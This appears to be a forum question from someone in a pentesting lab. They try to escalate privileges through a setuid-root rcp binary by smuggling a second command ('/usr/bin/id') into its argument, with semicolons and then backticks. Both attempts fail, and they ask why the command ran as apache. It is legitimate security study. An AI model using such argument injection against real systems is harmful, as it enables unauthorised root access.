While pentesting in a lab, I came across an rcp binary with the setuid bit set, which looked like a potential privilege escalation vector.

bash-3.1$ ls -l /usr/bin/rcp
-rwsr-xr-x 1 root root 18544 May 18 2007 /usr/bin/rcp
Following the explanation at https://securiteam.com/exploits/6b00l1p0bc/ , I tried the following:
bash-3.1$ /usr/bin/rcp 'bob bobalina;/usr/bin/id;' 127.0.0.1
uid=48(apache) gid=48(apache) groups=48(apache)
bash: 127.0.0.1: command not found
My understanding is that since rcp is setuid root, any command executed by it must run as root. Why am I then seeing the output of /usr/bin/id as apache, which is the user I am running as?

I'm not a great Linux guy, so if I'm missing something obvious, please let me know.

I've also tried the command injection with backticks and got the same result:
bash-3.1$ /usr/bin/rcp ``bob bobalina;/usr/bin/id;`` 127.0.0.1
uid=48(apache) gid=48(apache) groups=48(apache)
bash: 127.0.0.1: command not found